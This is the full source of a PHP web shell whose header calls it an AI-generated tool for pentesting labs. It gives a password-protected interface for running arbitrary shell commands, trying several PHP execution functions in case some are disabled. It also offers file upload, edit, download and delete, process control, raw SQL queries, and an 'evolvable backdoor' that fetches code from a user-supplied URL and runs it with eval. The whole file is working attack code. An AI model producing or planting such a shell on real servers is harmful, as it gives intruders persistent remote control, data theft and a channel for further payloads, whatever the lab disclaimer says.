<?php
// PHP Web Shell for Pentesting Labs (PortSwigger, HackTheBox)
// Default Password: Azerty123
// Dark Theme with Dark Red Accents, Minimalist, Responsive Navigation
// Author: Generated by Grok for educational purposes only. Use responsibly in controlled environments.

// Security: Simple password protection
$password = 'Azerty123'; // Change this in production labs if needed
session_start();
if (!isset($_SESSION['authenticated'])) {
    if (isset($_POST['password']) && $_POST['password'] === $password) {
        $_SESSION['authenticated'] = true;
        header('Location: ' . $_SERVER['PHP_SELF']);
        exit;
    } else {
        echo '<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Login</title><style>body{background:#121212;color:#fff;font-family:Arial,sans-serif;display:flex;justify-content:center;align-items:center;height:100vh;margin:0;}form{background:#1e1e1e;padding:20px;border-radius:8px;box-shadow:0 0 10px rgba(0,0,0,0.5);}input[type="password"]{width:100%;padding:10px;margin:10px 0;background:#333;color:#fff;border:1px solid #900;}input[type="submit"]{background:#900;color:#fff;border:none;padding:10px;cursor:pointer;}input[type="submit"]:hover{background:#700;}</style></head><body><form method="post"><h2>Web Shell Login</h2><input type="password" name="password" placeholder="Enter Password"><input type="submit" value="Login"></form></body></html>';
        exit;
    }
}

if (isset($_GET['logout'])) {
    session_destroy();
    header('Location: ' . $_SERVER['PHP_SELF']);
    exit;
}

// Helper function to execute commands with bypass if functions are disabled
function safe_exec($cmd) {
    $output = '';
    $functions = ['shell_exec', 'exec', 'passthru', 'system', 'popen', 'proc_open'];
    foreach ($functions as $func) {
        if (function_exists($func)) {
            switch ($func) {
                case 'shell_exec':
                    $output = shell_exec($cmd);
                    break;
                case 'exec':
                    exec($cmd, $output);
                    $output = implode("\n", $output);
                    break;
                case 'passthru':
                    ob_start();
                    passthru($cmd);
                    $output = ob_get_clean();
                    break;
                case 'system':
                    ob_start();
                    system($cmd);
                    $output = ob_get_clean();
                    break;
                case 'popen':
                    $handle = popen($cmd, 'r');
                    while (!feof($handle)) {
                        $output .= fread($handle, 4096);
                    }
                    pclose($handle);
                    break;
                case 'proc_open':
                    $descriptors = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
                    $process = proc_open($cmd, $descriptors, $pipes);
                    fclose($pipes[0]);
                    $output = stream_get_contents($pipes[1]);
                    fclose($pipes[1]);
                    fclose($pipes[2]);
                    proc_close($process);
                    break;
            }
            if (!empty($output)) {
                return $output;
            }
        }
    }
    return 'No execution function available.';
}

// Current directory
$dir = isset($_GET['dir']) ? realpath($_GET['dir']) : getcwd();
if (!is_dir($dir)) $dir = getcwd();
chdir($dir);

// Handle actions
$action = isset($_GET['action']) ? $_GET['action'] : '';
$message = '';

// File Upload
if (isset($_POST['upload']) && isset($_FILES['file'])) {
    $target = $dir . '/' . basename($_FILES['file']['name']);
    if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
        $message = 'File uploaded successfully.';
    } else {
        $message = 'File upload failed.';
    }
}

// File Download
if ($action === 'download' && isset($_GET['file'])) {
    $file = realpath($dir . '/' . $_GET['file']);
    if (file_exists($file) && strpos($file, $dir) === 0) {
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($file) . '"');
        header('Expires: 0');
        header('Cache-Control: must-revalidate');
        header('Pragma: public');
        header('Content-Length: ' . filesize($file));
        readfile($file);
        exit;
    }
}

// File Delete
if ($action === 'delete' && isset($_GET['file'])) {
    $file = $dir . '/' . $_GET['file'];
    if (file_exists($file)) {
        if (is_dir($file)) {
            rmdir($file);
        } else {
            unlink($file);
        }
        $message = 'File deleted.';
    }
}

// File Edit
if ($action === 'edit' && isset($_GET['file'])) {
    $file = $dir . '/' . $_GET['file'];
    if (isset($_POST['content'])) {
        file_put_contents($file, $_POST['content']);
        $message = 'File saved.';
    }
    $content = htmlspecialchars(file_get_contents($file));
}

// Console Command
$cmd_output = '';
if (isset($_POST['cmd'])) {
    $cmd_output = safe_exec($_POST['cmd']);
}

// System Info
if ($action === 'sysinfo') {
    $sysinfo = [
        'OS' => php_uname(),
        'PHP Version' => phpversion(),
        'Server Software' => $_SERVER['SERVER_SOFTWARE'],
        'User' => safe_exec('whoami'),
        'Disk Usage' => disk_free_space('/') / (1024*1024*1024) . ' GB free / ' . disk_total_space('/') / (1024*1024*1024) . ' GB total',
        'Uptime' => safe_exec('uptime'),
        'Network' => safe_exec('ifconfig || ip addr'),
        'Disabled Functions' => ini_get('disable_functions'),
        'Safe Mode' => ini_get('safe_mode') ? 'On' : 'Off',
    ];
}

// Process Management
if ($action === 'processes') {
    $processes = safe_exec('ps aux');
    if (isset($_POST['kill'])) {
        safe_exec('kill -9 ' . intval($_POST['pid']));
        $message = 'Process killed.';
    }
    if (isset($_POST['execute'])) {
        safe_exec($_POST['new_cmd'] . ' &');
        $message = 'Process started.';
    }
}

// Database Management (Assumes MySQL, credentials needed)
$db_output = '';
if ($action === 'db' && isset($_POST['query'])) {
    // Placeholder: User must provide credentials in form
    $host = $_POST['host'] ?? 'localhost';
    $user = $_POST['user'] ?? 'root';
    $pass = $_POST['pass'] ?? '';
    $dbname = $_POST['dbname'] ?? '';
    try {
        $pdo = new PDO("mysql:host=$host;dbname=$dbname", $user, $pass);
        $stmt = $pdo->query($_POST['query']);
        $db_output = '<pre>' . print_r($stmt->fetchAll(PDO::FETCH_ASSOC), true) . '</pre>';
    } catch (Exception $e) {
        $db_output = 'Error: ' . $e->getMessage();
    }
}

// Remote Code Inclusion (Evolvable Backdoor)
if ($action === 'remote_include' && isset($_POST['url'])) {
    $remote_code = file_get_contents($_POST['url']);
    if ($remote_code) {
        eval($remote_code); // Dangerous! Use only in labs.
        $message = 'Remote code executed.';
    } else {
        $message = 'Failed to fetch remote code.';
    }
}

// List files
$files = scandir($dir);
$parent = dirname($dir);

// HTML Output
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>PHP Web Shell</title>
    <style>
        body { background: #121212; color: #fff; font-family: Arial, sans-serif; margin: 0; padding: 0; }
        nav { background: #1e1e1e; padding: 10px; position: fixed; width: 100%; top: 0; z-index: 1; }
        nav ul { list-style: none; padding: 0; margin: 0; display: flex; justify-content: space-around; flex-wrap: wrap; }
        nav ul li { margin: 5px; }
        nav ul li a { color: #fff; text-decoration: none; padding: 8px 16px; background: #900; border-radius: 4px; }
        nav ul li a:hover { background: #700; }
        .container { margin-top: 60px; padding: 20px; }
        table { width: 100%; border-collapse: collapse; margin-bottom: 20px; }
        th, td { border: 1px solid #333; padding: 8px; text-align: left; }
        th { background: #1e1e1e; }
        .message { color: #0f0; }
        form { margin-bottom: 20px; }
        input, textarea, button { background: #333; color: #fff; border: 1px solid #900; padding: 8px; margin: 5px 0; }
        textarea { width: 100%; height: 200px; }
        pre { background: #1e1e1e; padding: 10px; border: 1px solid #333; overflow: auto; }
        @media (max-width: 600px) { nav ul { flex-direction: column; } }
    </style>
</head>
<body>
    <nav>
        <ul>
            <li><a href="?dir=<?php echo urlencode($dir); ?>">File Browser</a></li>
            <li><a href="?action=upload&dir=<?php echo urlencode($dir); ?>">Upload</a></li>
            <li><a href="?action=console&dir=<?php echo urlencode($dir); ?>">Console</a></li>
            <li><a href="?action=sysinfo&dir=<?php echo urlencode($dir); ?>">System Info</a></li>
            <li><a href="?action=processes&dir=<?php echo urlencode($dir); ?>">Processes</a></li>
            <li><a href="?action=db&dir=<?php echo urlencode($dir); ?>">Database</a></li>
            <li><a href="?action=remote_include&dir=<?php echo urlencode($dir); ?>">Remote Include</a></li>
            <li><a href="?logout=1">Logout</a></li>
        </ul>
    </nav>
    <div class="container">
        <h1>Web Shell - Current Dir: <?php echo htmlspecialchars($dir); ?></h1>
        <?php if ($message) echo '<p class="message">' . $message . '</p>'; ?>

        <?php if ($action === 'edit' && isset($content)): ?>
            <h2>Edit File: <?php echo htmlspecialchars($_GET['file']); ?></h2>
            <form method="post">
                <textarea name="content"><?php echo $content; ?></textarea>
                <button type="submit">Save</button>
            </form>
        <?php elseif ($action === 'upload'): ?>
            <h2>Upload File</h2>
            <form method="post" enctype="multipart/form-data">
                <input type="file" name="file">
                <button type="submit" name="upload">Upload</button>
            </form>
        <?php elseif ($action === 'console'): ?>
            <h2>Console</h2>
            <form method="post">
                <input type="text" name="cmd" placeholder="Enter command" style="width: 80%;">
                <button type="submit">Execute</button>
            </form>
            <?php if ($cmd_output): ?>
                <pre><?php echo htmlspecialchars($cmd_output); ?></pre>
            <?php endif; ?>
        <?php elseif ($action === 'sysinfo'): ?>
            <h2>System Info</h2>
            <ul>
                <?php foreach ($sysinfo as $key => $value): ?>
                    <li><strong><?php echo $key; ?>:</strong> <?php echo htmlspecialchars($value); ?></li>
                <?php endforeach; ?>
            </ul>
        <?php elseif ($action === 'processes'): ?>
            <h2>Process Management</h2>
            <pre><?php echo htmlspecialchars($processes); ?></pre>
            <form method="post">
                <input type="number" name="pid" placeholder="PID to kill">
                <button type="submit" name="kill">Kill Process</button>
            </form>
            <form method="post">
                <input type="text" name="new_cmd" placeholder="Command to execute">
                <button type="submit" name="execute">Execute Process</button>
            </form>
        <?php elseif ($action === 'db'): ?>
            <h2>Database Management</h2>
            <form method="post">
                <input type="text" name="host" placeholder="Host" value="localhost">
                <input type="text" name="user" placeholder="User" value="root">
                <input type="password" name="pass" placeholder="Password">
                <input type="text" name="dbname" placeholder="Database">
                <textarea name="query" placeholder="SQL Query"></textarea>
                <button type="submit">Execute Query</button>
            </form>
            <?php if ($db_output): ?>
                <?php echo $db_output; ?>
            <?php endif; ?>
        <?php elseif ($action === 'remote_include'): ?>
            <h2>Remote Code Inclusion</h2>
            <form method="post">
                <input type="text" name="url" placeholder="URL to remote code">
                <button type="submit">Include & Execute</button>
            </form>
        <?php else: ?>
            <h2>File Browser</h2>
            <a href="?dir=<?php echo urlencode($parent); ?>">Parent Directory</a>
            <table>
                <tr><th>Name</th><th>Size</th><th>Actions</th></tr>
                <?php foreach ($files as $file): if ($file === '.' || $file === '..') continue; ?>
                    <tr>
                        <td>
                            <?php if (is_dir($dir . '/' . $file)): ?>
                                <a href="?dir=<?php echo urlencode($dir . '/' . $file); ?>"><?php echo htmlspecialchars($file); ?>/</a>
                            <?php else: ?>
                                <?php echo htmlspecialchars($file); ?>
                            <?php endif; ?>
                        </td>
                        <td><?php echo is_file($dir . '/' . $file) ? filesize($dir . '/' . $file) . ' bytes' : ''; ?></td>
                        <td>
                            <?php if (is_file($dir . '/' . $file)): ?>
                                <a href="?action=download&file=<?php echo urlencode($file); ?>&dir=<?php echo urlencode($dir); ?>">Download</a> |
                                <a href="?action=edit&file=<?php echo urlencode($file); ?>&dir=<?php echo urlencode($dir); ?>">Edit</a> |
                            <?php endif; ?>
                            <a href="?action=delete&file=<?php echo urlencode($file); ?>&dir=<?php echo urlencode($dir); ?>" onclick="return confirm('Delete?');">Delete</a>
                        </td>
                    </tr>
                <?php endforeach; ?>
            </table>
        <?php endif; ?>
    </div>
</body>
</html>